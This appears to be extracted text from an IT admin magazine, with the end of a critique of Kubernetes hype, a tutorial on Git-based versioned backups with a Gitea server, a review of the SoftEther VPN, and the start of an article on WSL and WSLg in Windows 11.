In the second and significantly shorter part of this article, I really need to mention Kubernetes, the software that has undoubtedly given the container hype triggered by Docker a massive boost. Admins love modern technology, and once a solution becomes popular, it attracts admins like moths to the flame, as was the case with Kubernetes. For years, it has been the talk of the town. That said, many Kubernetes-based solutions presented today completely lose sight of what the software is all about and what problem it looks to solve: Kubernetes comes from the world of cloud computing and makes great sense, especially against this background.

A few years ago, Docker had just made containers on Linux respectable after solutions like OpenVZ had failed to do so for decades. The primary reason Docker was successful is that it offered not only the runtime environment for containers on Linux but also created a suitable ecosystem, which undoubtedly included the aforementioned Docker Hub.

At the time, however, cloud computing had long been seen as the means of choice for companies that wanted to move from being IT heroes to major platform providers and at least play in a league similar to Amazon. Containers promised huge dividends because both orchestration and automation combined with prepackaged applications are effectively the highway to platform-as-a-service (PaaS) and software-as-a-service (SaaS) offerings. What was still missing was a solution that could manage and control containers across any number of physical hosts in a completely automated way. Kubernetes quickly established itself as a solution for precisely this task, if only because the product, as an in-house development at Google (up to that point), was explicitly designed for that purpose.

Over-the-Top Hype

The vast majority of features that K8s has seen added in recent years, or that can be retrofitted with external tools, are for the PaaS and SaaS deployment areas already described. Kubernetes is far less well suited for classic infrastructure as a service (IaaS), for example. This niche is where classic virtual machines (VMs) based on KVM or Xen play to their strengths.

In some ways, this insufficiency is the crux of the problem, although it has never stopped many Kubernetes service providers from selling K8s as a solution to life, the universe, and everything. Local setups, so the story goes, also benefit from Kubernetes because it becomes easier to handle applications. The fact that this only applies if the applications are suitable for operation in containers at all and, even then, that many conventional applications present their own challenges, is deliberately concealed by the advertising blurb. Most of the problems already described for containers without K8s also apply to containers in Kubernetes. Granted, some companies are using the move to containers and Kubernetes to make a clean sweep of their existing application landscape, and even rewriting some parts of it, but this is by no means possible or affordable in every case.

Kubernetes also is designed in the best possible way to scale seamlessly across the board (i.e., to provide the underpinnings of an eternally growing platform). However, you only really need this if you want to operate a platform that can handle any amount of data and services. If you have a clearly separated setup in mind with a defined target size (with some scope for fluctuation), you will be hard put to use most of Kubernetes' functionality in a meaningful way. In these cases, K8s quickly becomes a hyper-complex chunk at the end of the process, the complexity of which bears no relation to the actual needs and benefits.

Conclusions

Kubernetes is primarily of interest to enterprises that want to run arbitrary numbers of containers for SaaS or PaaS applications across large fleets of physical systems. Kubernetes can also be used for internal purposes. For example, if you are converting your production software to as-a-service principles, Kubernetes will serve you well internally. In this respect, operating a K8s platform is by no means tied to being a major platform provider.

If you're looking for a solution that rolls out individual applications in a neatly automated and scalable way, though, you'll have an easier life with a solution that is based on classic
automation, just as you did with containers. If required, the automation can be combined with virtualization: The combination of VMware or KVM and Ansible is found in many places. Virtualization solutions such as Proxmox (Figure 5), which can be easily integrated with existing automation, are also helpful. Almost all of these pairings are far easier to handle and maintain than K8s, and accordingly offer less functionality.

For many companies embarking on the Kubernetes adventure without a clear roadmap, the functionality offered by classic automation will be completely sufficient: Containers and container automation are not just the continuation of virtualization by other means.

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Chef.

Figure 5: Like other virtualization solutions, Proxmox Virtual Environment can easily team up with many automation tools, ensuring a kind of scalability. However, the entire setup is far less complex than a full-blown K8s environment. © Proxmox
TOOLS Git Versioned Backups

Versioned backups of local drives with Git

Genealogy

Versioning is a recommended approach to back up files as protection against hardware failures and user errors. To create versioned backups, you can use established backup programs or an open source tool that originates from the developer world: Git. By Andreas Stolzenberger

Despite cloud and file servers on the corporate network, users still store important files on the local hard drives of their workstations or laptops. Modern solid-state drives (SSDs) lull users into a deceptive sense of security: Thanks to technologies such as self-monitoring, analysis, and reporting technology (S.M.A.R.T.) and wear leveling, these data storage devices can predict their demise and usually warn the user in time before a disk failure. However, valuable data is rarely lost by spontaneous disk failure. More often, the cause of data loss is the users themselves accidentally deleting or overwriting files. If you travel with your laptop, you also have to worry about losing the device or damaging it irreparably.

A device and its operating system and applications can be replaced quickly, but it's a different story for user files. Therefore, every user with important files on their local computer needs a viable backup and restore strategy that covers the following functions:
• Multilevel file versioning
• Local backup
• Remote backup over local area network (LAN)
• Optional remote backup over wide area network (WAN)
• Backup and recovery independent of the operating system

On the free market, all common operating systems have tons of backup programs – many with inexplicably confusing user interfaces. For most users, the backup chain ends at the USB drive, but if you want to back up your data, it is better to use a network share. Common cloud backup tools, on the other hand, back up directly to the connected cloud and therefore only work if you are online.

Backup with Git

The Git [1] tool supports code versioning, shows the details of the differences between saved versions, and allows multiple developers to work together on a project. Because it works online and offline, this popular open source application is more or less a perfect backup program; moreover, it is available for all common operating systems. The backup format is openly documented – independent of the operating system and filesystem – and not a proprietary file format.

Anyone who creates a Git repository first creates an object store with copies of the selected data. This object store keeps track of the changes in the files saved in it. As soon as the user makes a "commit" (i.e., a snapshot of the files), Git remembers the changes to the previous version. Users can roll back the entire repository or individual files to previous versions if they want and recover accidentally deleted information from a previous snapshot.

However, Git does not just back up its repository on the local system. Users can create one or more remote copies of the repository and upload the versions there. Luckily, remote repositories do not need to receive every single commit immediately. A user can write many consecutive commits to the local repository and then send an update to the remote repository. Git's delta mechanism will submit all missed commits from the local repository so that the remote repository ends up containing all intermediate steps.
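The delta mechanism is easy to see in a throwaway sandbox. In the following sketch, a bare repository in a local directory stands in for the remote server, and all paths and names are illustrative:

```shell
# Two local commits reach the "remote" in a single push,
# including the intermediate snapshot.
rm -rf /tmp/gitdemo && mkdir -p /tmp/gitdemo && cd /tmp/gitdemo
git init -q work                      # the local working repository
git init -q --bare remote.git         # stands in for the remote server
cd work
git config user.email "demo@example.com" && git config user.name "Demo"
echo v1 > notes.txt && git add -A && git commit -qm "first snapshot"
echo v2 > notes.txt && git commit -qam "second snapshot"
git remote add backup ../remote.git
git push -q backup HEAD               # transfers both commits at once
```

After the push, the remote repository holds the complete history, even though only one transfer took place.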
Git is also very flexible when it comes to restoring. You can conveniently access previous versions of individual files or entire directories at the command line or in one of the many available Git user interfaces (UIs). When doing so, you do not need to overwrite the existing version but can save an earlier version under a different name. You also have a wide choice of Git servers and, here too, you can view, modify, or download individual files on the web UI, if required.

Git on Windows

The Git homepage offers a setup for Git on Windows [2]. In addition to the plain vanilla command-line (CLI) tool for the Windows prompt and PowerShell, Git also provides the necessary OpenSSL libraries and tools and a MinGW environment, the native Windows port of the GNU Compiler Collection (GCC), that lets Windows administrators run Git from the command line or in PowerShell, as well as in Git Bash.

Windows also has a number of graphical UI (GUI) tools for Git. The popular GitHub Desktop is primarily aimed at application developers; however, this tool does not give you a very good overview, especially for large repositories. Although it is not open source, Atlassian provides its Git client Sourcetree [3] free of charge (Figure 1). The client can be used for both development and backup repositories. Git Extensions [4] offers a somewhat older, technically overloaded look and feel (Figure 2). In return, this free client is extremely fast and includes many features.

If you use the Eclipse development environment, the JGit tool, written in Java, is included. Unlike the conventional Git client, JGit also handles the Amazon Simple Storage Service (S3) protocol. If you want to store your repository somewhere instead of, or in addition to, the regular Git server, you can use JGit to move directly into an S3-compatible object store.

Figure 1: Atlassian's free tool Sourcetree provides insights into local and remote Git snapshots.

Distributing Local Git

For version control, Git creates the versioned repository in the .git subdirectory within the folder to be backed up. However, this does not work for the backup scenario here. The key to success is the --separate-git-dir parameter when creating the repository, which tells Git not to create the object store for versioning in the directory, but on a different path. In this case, .git is not the directory with the files, but a text file with the link to the external directory (i.e., it acts independently from the operating system and filesystem).

In this example, you will be creating a Git repository inside the regular user directory for documents and using a USB drive with drive letter H: for the object store:

mkdir h:\git_backup
cd %HOMEPATH%\Documents
git init --separate-git-dir=h:\git_backup
git add -A

If you have not used Git on the system before, the tool will ask you for global variables such as your username and email address; then, it creates the object directory on the USB drive. Depending on the volume of data in the document directory, this step can take some time. In this setup, Git writes its data at a rate of about 1.2GB per minute. The speed also depends on whether Git needs to write small or large files. During the write process you will see a number of warnings, such as:

warning: LF will be replaced by CRLF in <filename>

This message refers to the old dilemma that *nix systems define the end of line (LF, line feed) in a text file differently from Windows (CRLF, carriage return-line feed). Because Git works independently of the operating system, it always saves text files within the object memory in *nix format but leaves the original file unchanged. This automatic conversion should not bother you unless you are restoring a text file stored in Git without the Git tool. For example, if you download a text file from your repository over HTTP from a Git server with a web UI, no CRLF reconversion takes place.

Now that Git has copied all the data to the local repository, you can create a snapshot of the current state with a commit:

git commit -m "Repository created"
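For readers on Linux or macOS, the same workflow translates directly to a POSIX shell. In this sketch, /tmp/usb stands in for the USB drive H: and /tmp/docs for %HOMEPATH%\Documents; all paths are illustrative:

```shell
# Versioned backup with an external object store, POSIX edition.
rm -rf /tmp/usb /tmp/docs
mkdir -p /tmp/usb /tmp/docs && cd /tmp/docs
echo "quarterly figures" > report.txt
git init -q --separate-git-dir=/tmp/usb/git_backup
git config user.email "demo@example.com" && git config user.name "Demo"
git add -A
git commit -qm "Repository created"
cat .git    # a plain text file: gitdir: /tmp/usb/git_backup
```

The working directory stays clean: .git is just a one-line pointer file, while all version data lives on the external medium.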
TO O L S Git Versioned Backups

Now, if you make changes to files, Git tracks them and saves them for the next commit. Each commit is given a unique ID and, for clarity, a name that you pass in with the -m parameter – in this case Repository created. Later, you can see in the Git history exactly which files changed in which commit, but if you add new files to the directory, Git does not automatically include them in the repository. You need to run git add -A again before committing. To automate the process, create a suitable batch file:

set commitname=%date:~-4%%date:~-7,2%%date:~-10,2%-%time:~-11,2%%time:~-8,2%
set gitdir=%HOMEPATH%\Documents
cd %gitdir%
git add -A
git commit -m "%commitname%"

Now you can create a shortcut on the desktop and trigger the backup at the push of a button. Alternatively, create an automatic task that performs the backup regularly (e.g., every hour), but keep in mind that Git, like any other program, cannot include open files in the snapshot. Of course, the script can be prettified – for example, to check first whether the USB target disk is connected to the system before triggering the backup and initiating an upload to the server once a day. Now, to restore a single file to a previous state after an accidental change, use git restore as in Listing 1.

Listing 1: git restore

type mysql_rev1.json
Unfortunately overwritten

git log mysql_rev1.json
commit 780...
Author: Andreas ....
2200404-1300
...

git restore --source 780... mysql_rev1.json

type mysql_rev1.json
{
  "__inputs": [
    {
      "name": "MySQL",
      "label": "MySQL",
      "description": "MySQL Data Source",
...

Figure 2: In the Git Extensions open source tool, you can see the complete history of commits.

Git Server Selection

One of the most popular self-hosted Git servers is GitLab [5], which of course also runs on the service at gitlab.com. However, the massive GitLab, written in Ruby, requires quite a bit of performance on the part of the server hardware. In return, GitLab delivers a wide range of functions, such as a wiki, a bug tracker, and an integrated container image repository. If you only


use a Git server as a backup target, you don't need all of these features and are better off with a simple, but agile, Git server like Gitea [6], which handles many databases and runs in containers with low resource requirements (Figure 3). For administrators with a predominantly Windows background, the free Bonobo [7] Git Server in .NET integrates directly with Internet Information Services (IIS).

To create a second, remote backup of a local repository, you need a Git server. Here, too, you have a whole range of open source offerings. Gitea is the simplest solution for newcomers. Written in Go, it derives from the in-house Git server Gogs but is maintained by a somewhat more liberal developer community than the original. Like Git itself, Gitea is available for all major platforms, so the server service also runs smoothly on Windows. All you need is an existing Git installation and a database. Gitea supports MySQL and PostgreSQL as well as Microsoft SQL Server (MSSQL) or, for simple test setups, SQLite. Of course, Gitea can also be run in a Podman or Docker container.

Once started, Gitea listens on ports 3000 (HTTP) and 22 (SSH) by default. In the simple and clear-cut web UI, you first need to create the user accounts. To avoid the need to log in with a username and password, you will want to use SSH keys to authenticate. The key pairs usually are generated with a centralized key management system and then assigned to the users. In smaller environments, however, users on the client PCs can create key pairs themselves with ssh-keygen. Remember always to keep a copy of the SSH keys outside the client PC.

Figure 3: The simple Gitea Git server functions as a central backup server in the LAN or WAN.

With the remote server running, you first log in to the Gitea UI with your user account, where you store the public SSH key, if this has not already been done elsewhere. In your


account, you then create an empty repository for the backup data and mark it as a Private repository. Gitea returns the appropriate SSH URL. Now you can add the remote storage path origin to the existing local repository,

git remote add origin git@<Server>:<User/Repository>.git

and copy the local repository, including all previous commits, to the remote server:

git push -u origin main

The -u lets you define the remote server origin as the default upstream server for the repository. Future changes can then be sent to the origin server with the git push command, without any additional parameters. Git lets you specify multiple remote repositories and use

git push <name>

to send the updates to different servers.

The Git server can run on the company LAN as well as on a cloud system or in the demilitarized zone (DMZ) with an Internet connection. Because communication between the client and server relies on SSH encryption anyway, the cloud backup to the in-house Git server is secure even without a virtual private network (VPN). Either the web interface of the Gitea server on port 3000 should be protected by a reverse proxy/load balancer with HTTPS termination, or the service itself should run on HTTPS with a suitable certificate. To do this, modify the configuration of Gitea in ./gitea/conf/app.ini and expand the following section:

[server]
PROTOCOL = https
ROOT_URL = https://<URL>:<Port>
HTTP_PORT = <Port>
CERT_FILE = cert.pem
KEY_FILE = key.pem

Hosted Git services such as GitHub or GitLab are obviously out of the question as backup targets because they limit the size of the repositories.

Git in Git

Once you have familiarized yourself with the Git tool, you can optimize its use. For example, if you are just working on a project for a certain period of time, you can back up all related data to a separate directory and therefore to a separate Git. If the folder is inside an existing repository, Git notices and excludes the project directory as its own repository from the underlying Git. The user then backs up two repositories: the document directory itself and the project. Thanks to Git's group features, project data can be shared between workgroups and checked out to multiple clients. When the project is completed, the clients can delete the local project directory, and the Git server keeps all the data as an archive that is available to users at any time.

Conclusions

Backup and version control are closely related topics, so Git is a very good choice as a backup tool for user data. Of course, Git does not back up the operating system or the installed applications or their configuration in the registry.

Info
[1] Git: [https://git-scm.com]
[2] Git for Windows: [https://git-scm.com/download/win]
[3] Sourcetree: [https://www.sourcetreeapp.com]
[4] Git Extensions: [http://gitextensions.github.io]
[5] Download from GitLab: [https://about.gitlab.com/install/]
[6] Gitea: [https://gitea.io/en-us/]
[7] Bonobo: [https://bonobogitserver.com]

TOOLS VPN with SoftEther

SoftEther VPN software

Speed in the Tunnel


SoftEther is lean VPN software that outpaces the current king of the hill, OpenVPN, in terms of technology and performance. By Holger Reibold

In the age of home offices and distributed locations, companies want security solutions that can be integrated easily into existing infrastructures, offer genuine added value, and secure communications between mobile clients and sites. OpenVPN was long considered the measure of all things VPN, but the business model was developed at the expense of the community edition and has various restrictions. For example, the classic tool only supports its own virtual private network (VPN) protocol and does not offer support for natively integrated VPN clients from Android, iOS, macOS, and Windows.

Fast SoftEther Alternative

SoftEther [1], whose name contains elements of software and Ethernet, has something to offer to counter the aforementioned limitations. The open source VPN supports VPN protocols such as Secure Socket Layer (SSL) VPN, the Layer 2 Tunneling Protocol (L2TP)/Internet Protocol Security (IPsec), OpenVPN, and Microsoft Secure Socket Tunneling Protocol (SSTP). SoftEther supports network address translation (NAT) traversal, which means you can run the VPN server on a machine located behind home gateways, facility routers, and firewalls. Firewalls that perform deep packet inspection do not recognize SoftEther's VPN transport packets as VPN tunnels because HTTPS is used to disguise the connection. Other highlights include:

• Site-to-site and remote access VPN connections
• Access to restricted public wireless local-area networks (WLANs) by VPN over Internet Control Message Protocol (ICMP) and VPN over DNS
• Ethernet bridging and Layer 3 over VPN
• Logging and firewalling in the VPN tunnel
• Support for relevant operating systems (Windows, Linux, macOS, Android, iOS)
• Cloning OpenVPN connections
• RADIUS/NT domain authentication of users

A table showing the direct comparison between the two VPN applications can be found online [2]. Apart from purely technological aspects, the biggest benefit is fast speed. On the basis of performance measurements, various studies show that OpenVPN has a data throughput of less than 100Mbps, which often turns out to be a bottleneck. According to the developers, SoftEther provides speeds of more than 900Mbps. Performance is achieved through utilization of the full Ethernet frame. At the same time, the software reduces memory copying and relies on parallel transfer and clustering. The sum of these measures significantly reduces latency and massively boosts throughput. Another special feature of SoftEther, its modular architecture, lets you expand the basic system to include additional functions, such as VPN Gate. Thanks to versatile protocol support, you usually don't have to install the SoftEther client. However, if you make intensive use of the VPN environment, you will want to use the client for performance reasons alone.

SoftEther in Operation

The name "SoftEther" points to the architecture of the VPN software: Virtualization creates a virtual Ethernet adapter and generates a switch that emulates a conventional Ethernet switch – in SoftEther terminology, it is referred to as a virtual hub. The VPN connection is established by the two components working together over a virtual Ethernet cable.

The SoftEther version at the time of publication was 4.39. The installation packages for the supported operating systems are available from the SoftEther download center [3]. The SoftEther server is at the core of the environment. It is especially easy to install


on Windows, where the setup wizard guides you through the various steps. During the install, you can choose between the server and the VPN bridge. Server Manager is automatically installed and supports centralized administration of various SoftEther installations. To configure the local SoftEther infrastructure, you just connect to the VPN server with a single click and specify a server-specific password.

The ease of working with SoftEther soon becomes apparent (Figure 1). In the SoftEther VPN Server/Bridge Easy Setup dialog, you can choose from the two most common installation variants: Remote Access VPN Server or Site-to-Site VPN Server to VPN Bridge. If you want to use advanced configurations such as clustering, you need to do so manually. The setup dialog supports you in the decision-making process, in that it provides a visualization and brief description of the scenario in question with information relevant to decision making. In this article, I look at the remote access scenario, where the VPN clients establish a secure connection to the VPN server, allowing access to the network behind it. Pressing Next in the setup wizard opens the hint dialog that informs you the server is initialized. You only have to confirm at this point and proceed to assign a name to the server configuration.

Figure 1: The user-friendly SoftEther server setup wizard has information on typical deployment scenarios.

The setup wizard now reveals another special feature. The VPN server has a built-in dynamic DNS feature that assigns a permanent DNS name to the server, making it globally accessible. Pressing Exit completes the basic configuration and you can carry on with the next step. You can integrate the local VPN server with the Azure Cloud Service (not to be confused with Microsoft's cloud service). VPN Azure Cloud is a free cloud VPN service from the SoftEther project. In the context of this example, it is difficult to say whether or not it makes sense to use it. My recommendation is to disable the associated function by selecting Disable VPN Azure. Then press OK to close this dialog.

The next step is to set up the first SoftEther user by clicking on Create Users and assigning a username, real name, password, and authentication method. If you are running a RADIUS server or Active Directory, specify the associated username. You can also use existing certificates. SoftEther is now ready for use.

Installing the Client

In principle, SoftEther lets you use the native VPN clients of today's popular operating systems, but the SoftEther client is recommended for regular use of the VPN environment. The installation packages are also available from the download center. The installer sets up a virtual network adapter and a background service on the client side. As with the SoftEther server, the client provides a VPN Client Manager that you use to manage various VPN connections and connection-specific settings. To connect to the SoftEther server, double-click on Add VPN Connection in the Client Manager and assign a name, the server data, the virtual network adapter to be used, and the access data to the connection in the associated New VPN Connection Setting Properties dialog. If required, you can also use a proxy server.

One highlight on the client side is the advanced connection settings, which are hidden behind the Advanced Settings button. You can significantly improve performance by increasing the number of connections under Number of TCP Connections (Figure 2). For broadband connections, the value can be up to 8 parallel connections; for dial-up connections you will want to keep the default value of 1.

If sufficiently powerful systems are available on the client and server side, enabling data compression by checking Use Data Compression can provide a significant performance boost. The SoftEther VPN protocol can internally compress and transmit all Ethernet frames sent and received. The Deflate algorithm is used here. Data compression reduces the communication volume by up to 80 percent, but compression and decompression do cause a significant increase in the compute load. Compression has its limits, however: If the line speed exceeds 10Mbps, not compressing data often improves communication speed. A final OK accepts the connection settings, and you can open a VPN to the SoftEther server in the Client Manager just by double-clicking.

The Client Manager offers a wealth of other practical features. For example, you can export and import connection


settings for use on third-party systems and create additional virtual adapter and smart card configurations. The Client Manager tags the existing VPN connections as Connected in the Status column. You can access the connection details by right-clicking on the connection settings and selecting the View Status command.

Managing SoftEther Environments

SoftEther server administrative operations are divided into two types: server management and administration of virtual hubs in a VPN server configuration. The developers placed great emphasis on decoupling the VPN server process from configuration tweaks when designing the environments, which ensures that VPN functionality is available without interruptions. You only need to restart SoftEther if the operating system requires you to do so, when the VPN server program is updated, when the server process is restarted because of a hardware or software error, or when you make manual changes to the VPN server configuration file. Changes to the clustering configuration are the only tasks that require stopping the VPN service.

For all administrative tasks, you can use the Server Manager or the vpncmd console tool. SoftEther supports two types of administrative permissions: management authority for the entire VPN server and for virtual hubs. The server administrator should be identical to the server computer admin. In particular, the admin is responsible for managing the certificates and ports. Furthermore, they have full access to the vpn_server.config SoftEther configuration file. In addition to server configuration, this file also contains the encrypted admin password and the private key of the connection setup certificate, so it requires special protection. In the Windows installation, only members of the Administrator and SYSTEM groups have read and write permissions; the same applies on Unix-based systems.

Administrative Tasks

VPN Server Manager is the central interface for typical administrative tasks. Pressing the About this VPN Server button tells SoftEther to show you a tabular overview with server information that specifically includes the server type (usually Standalone), the operating system, a plethora of general server data, and supported services and functions. For an overview of the current state of the server, press the View Server Status button; alternatively, use the ServerStatusGet command at the command line. The overview shows the number of active sockets, virtual hubs, and sessions. It also tells you how many users and groups were active and what data volumes were transferred. To view the list of current connections, click the Show List of TCP/IP Connections button in the Server Manager. Here, you can find out which clients have opened a VPN connection to the SoftEther server and when the connection was initialized.

Figure 2: The SoftEther Server Manager is the central interface to the VPN server instances.

In practice, it is always useful to be able to take a look at the current configuration file (e.g., to verify whether any configuration adjustments you have made have been implemented in the central system configuration). To view the config file, press Edit Config. The dialog box comes up with the text file but does not allow editing. That said, you can restore the factory settings, save the configuration file, or load and enable an alternative file.

The OpenVPN clone server feature is useful for organizations that are still using OpenVPN but want to migrate after evaluating SoftEther. You can use it to connect all OpenVPN clients, including iPhone and Android clients, to the SoftEther VPN server with minimal overhead. The settings are hidden behind the OpenVPN/MS-SSTP Setting button. Proceeding is very easy: Just enable the clone function and specify


the UDP ports that OpenVPN uses. SoftEther takes care of everything else. You can then disconnect the OpenVPN server from the network, but make sure that cloning works reliably with random tests beforehand.

SoftEther as a LAN Tester

SoftEther can also be used to test and simulate network configurations. For example, SoftEther has a delay, jitter, and packet loss generator that lets you simulate a network or network segment in poor condition. To begin, define two local bridges from a virtual hub to two physical Ethernet network adapters. The two Ethernet network segments are bridged by the virtual hub, which introduces delay, jitter, and packet loss as it forwards Ethernet frames. The generator is particularly suitable for testing VoIP devices. To put such an Ethernet-based network topology through its paces, use the VPN server, a client, and a bridge. On the SoftEther server, create multiple separate Ethernet segments; the VPN server relies on a virtual Layer 3 switch function that provides IP-based Layer 3 routing between L2 segments. An access control list (ACL) function for packet filtering is available for the virtual hub configuration. You can use these L2 and L3 functions to test the network design.

The SoftEther software has a variety of other features that are of interest for enterprise use. For example, you can use the environment to implement a virtual network with connectivity to well-known cloud services. It is also possible to set up your own VPN-secured cloud.

Conclusions

SoftEther is excellent VPN software that makes many established tools look old fashioned. In particular, the versatile support for VPN protocols, the above-average performance, and great convenience for users make SoftEther an attractive VPN alternative. Despite all the enthusiasm, certain limitations exist. Unlike OpenVPN, SoftEther cannot operate as software as a service (SaaS), and it tends to target small to medium-sized environments. It also lacks a kill switch function and policy management. Another shortcoming is that the developers do not provide commercial support to date. That said, it would be a good thing for SoftEther to step out of the shadow of OpenVPN and the like and find many new friends in the admin community.

Info
[1] SoftEther: [https://www.softether.org]
[2] SoftEther vs. OpenVPN: [https://www.vpnxd.com/softether-vs-openvpn-which-one-better/]
[3] SoftEther download center: [https://www.softether-download.com/en.aspx]
TOOLS Windows Subsystems

Windows Subsystem for Linux and Android in Windows 11

Good Host
The Windows subsystem for Linux runs graphical applications on Windows 11 out of the box, and Windows
Subsystem for Android, out in preview at press time, shows that Windows can be a platform for Android
apps. We look at the state of the art and help you get started. By Christian Knermann

High-ranking Microsoft employees publicly making disparaging remarks about Linux is ancient history. Redmond has changed its course 180 degrees and impressively demonstrated that its commitment to the development of open source software is not mere lip service. For example, GitHub, the platform for collaborative version management for countless free projects, was acquired by Microsoft in 2018. However, Microsoft does not just operate the platform, it also actively contributes to many projects as one of the world's largest open source providers.

Additionally, Microsoft has developed its own Linux distribution named CBL-Mariner – where CBL stands for Common Base Linux – which you will find on GitHub, of course [1]. However, CBL-Mariner is by no means designed to compete with established Linux distributions for general-purpose use. Microsoft mainly uses its in-house distribution itself, following an approach that is most comparable to Fedora CoreOS. CBL-Mariner, as a minimalist distribution, is primarily geared toward running containers. It forms the basis for the Azure Kubernetes Services and other services in the Azure cloud. However, CBL-Mariner is not only relevant for Microsoft's cloud activities, it now also handles tasks under the hood of the Windows Subsystem for Linux (WSL).

Graphical Linux Apps

The second version of WSL sees Microsoft place the subsystem on completely new underpinnings. The basis is the Virtual Machine Platform feature, which also provides the foundation for Hyper-V. Unlike Hyper-V, however, WSL does not rely on full virtualization, but on containers. In concrete terms, this means that not every Linux distribution installed in WSL will run on a fully virtualized machine, but all distributions share a common kernel. The advantage is that WSL gets by with significantly fewer resources than Hyper-V.

That said, during my last visit to the site, some add-ons were still missing, and I had to resort to an X server on Windows to run graphical Linux applications [2]. Native support for X11 and Wayland apps was initially only found as a preview in the Windows Insider program. After the introduction of Windows 11, Microsoft has finalized the


Windows Subsystem for Linux GUI (WSLg) [3]. The basis for this is the WSLg system distribution based on CBL-Mariner (Figure 1), which runs Weston, the reference implementation of the server for the Wayland remote display protocol, which Microsoft has adapted for use with WSL and optimized for displaying individual applications instead of entire desktop environments over the Remote Desktop Protocol (RDP). Besides Wayland applications, WSLg can also handle classic X11 applications. The additional PulseAudio server takes care of the bidirectional transmission of audio signals.

When you work with WSL, you will not see any of this architecture, which seems complex at first glance but offers several advantages. The applications within your user distributions, of which you can install and run several in parallel, use their familiar Linux interfaces without customization. Windows, on the other hand, accesses them by RDP without having to worry about implementing X11 or Wayland. In this way, Linux applications can also use the host's physical GPUs, if available. This setup not only benefits graphically intensive applications, but also those that require GPUs for machine learning (ML) or artificial intelligence (AI) use cases. Microsoft has ported the DirectX 12 interface to Linux for this purpose with its own kernel driver [4].

Upgrade from Windows 10 to 11

Microsoft has reserved WSLg exclusively for Windows 11 and has not backported it to Windows 10. The good news is that if you own a Windows 11-capable device, you can safely update. In the lab, existing Linux instances survived an upgrade installation from Windows 10 to 11 without any complications. After an upgrade, just make sure that WSL is up to date and that your Linux instances are all using version 2 of the subsystem. You can do this at the command line with admin privileges and list all existing Linux distributions by typing:

wsl --update
wsl --list -v

If you find a distribution that has not yet moved to version 2, you can change that with

wsl --set-version <name of distribution> 2
wsl --shutdown

and restart the subsystem.

Two Approaches to a Fresh Install

If you start with a fresh installation of Windows 11, on which WSL has not run so far, two approaches can give you the desired state. Before you start, make sure that hardware virtualization is active in your system's BIOS. The WSL setup does not check this state and responds with some less than meaningful hex code as an error message if you try to launch a Linux distribution. The hardware virtualization is called Intel VT-d/VT-x or AMD IOMMU, depending on the processor manufacturer, but it can also be hidden under other terms or in a submenu in the BIOS depending on the brand of your computer. If in doubt, consult the manufacturer's documentation.

If hardware virtualization is active, you can pop up an admin command line and install WSL with just one command that will do all the work for you:

wsl --install

Figure 1: The CBL-Mariner system distribution converts the Wayland and X11 display protocols to RDP.
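Because all WSL 2 distributions share the one lightweight utility VM described above, its resource consumption can also be capped globally in a .wslconfig file in the Windows user profile. The values below are arbitrary examples, not recommendations:

```ini
[wsl2]
memory=4GB     ; cap the RAM available to the shared WSL 2 VM
processors=2   ; number of virtual CPUs
```

WSL picks the file up the next time the subsystem starts; wsl --shutdown forces such a restart.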


The command starts by installing the required Windows features, the Virtual Machine Platform, and the Windows Subsystem for Linux if they are not already in place. You can also see this for yourself on Windows 11 in the legacy Control Panel in Programs and Features | Turn Windows features on or off. The setup routine then loads the current long-term support (LTS) version of Ubuntu from the Microsoft Store as the default distribution. If you prefer some other distribution, such as Kali Linux, which is popular among forensic experts, try:

wsl --install --distribution kali

Although the advantage is that this command handles all the required steps in one fell swoop, this approach has a drawback. When installing with wsl.exe, the subsystem itself and the Linux kernel use the Windows Update service to retrieve updates and the operating system; however, this approach is no longer preferred by Microsoft. Instead, Microsoft wants to decouple the updates for WSL from the operating system and deliver them from the Microsoft Store [5]. You can find WSL in the Microsoft Store as Windows Subsystem for Linux Preview, but don't worry that Microsoft currently still rates the app as a preview. It gives you the identical feature set – just not as a Windows feature, but as a state-of-the-art Store app.

Unlike the wsl command, however, the Store app unfortunately does not take care of dependencies. Without the Virtual Machine Platform, attempting to run a Linux distribution ends up with a hex code error and a note to the effect that a required feature is not installed. You need to add this feature to Windows first from the Control Panel or with

dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all

on a command line with admin privileges.

WSLg in Action

After the obligatory reboot, you can install a Linux distribution (e.g., Ubuntu, Kali Linux) from the Microsoft Store and then find it in the Start menu. When called for the first time, WSL opens and initializes a shell for the Linux instance and prompts you to specify a user and a password. This account is independent of your Windows user account and only exists within this Linux instance.

The usual shell commands let you update Linux and install graphical applications, such as the Gnome text editor or even the Mozilla Firefox web browser:

sudo apt update
sudo apt upgrade
sudo apt install gedit -y
sudo apt install firefox -y

When you're done, you can see for yourself that graphical applications not only launch from the shell but also show up as subfolders in the respective Linux distribution in the Start menu (Figure 2). WSL has caught up with Google ChromeOS and seamlessly integrates Linux apps into the Windows interface.

File exchange between the two worlds is bidirectional. You can access all your Windows drives in WSL as mountpoints (e.g., /mnt/c and /mnt/d). On Windows, you will find the root filesystems of all your installed distributions in subfolders of the \\wsl$ virtual network share.

If you need graphical tools that do not exist as native applications for Windows or if you develop ML/AI use cases with Linux as the target platform, WSL on Windows 11 is a useful tool.

Figure 2: WSLg seamlessly integrates graphical Linux applications with Windows.
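The bidirectional file exchange lends itself to scripted backups from inside WSL. The sketch below simulates the /mnt/c mountpoint with a temporary directory so that it also runs outside WSL; all paths and file names are invented for the demo.

```shell
# Inside WSL, drive C: appears under /mnt/c; a temp directory stands in
# for it here so the demo runs on any Linux system.
win_c=$(mktemp -d)                          # stand-in for /mnt/c
mkdir -p "$win_c/Users/demo/Documents"
echo "quarterly numbers" > "$win_c/Users/demo/Documents/report.txt"

backup_dir=$(mktemp -d)                     # stand-in for a Linux-side folder
cp "$win_c/Users/demo/Documents/report.txt" "$backup_dir/"
cat "$backup_dir/report.txt"                # prints: quarterly numbers
```

On a real system you would replace the stand-in with the actual /mnt/c path of your Windows profile.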


systemd

The systemd init system has become more or less the standard in most distributions. Unfortunately, at the time of writing this article, in contrast to a full-fledged Linux VM, WSL did not have systemd and the common commands like systemctl. Since then, systemd for WSL has been released [6], which will allow you, for example, to start the classic trio of daemons for a web server, script interpreter, and database (e.g., Nginx, PHP, and MySQL).

USB Support over the Network

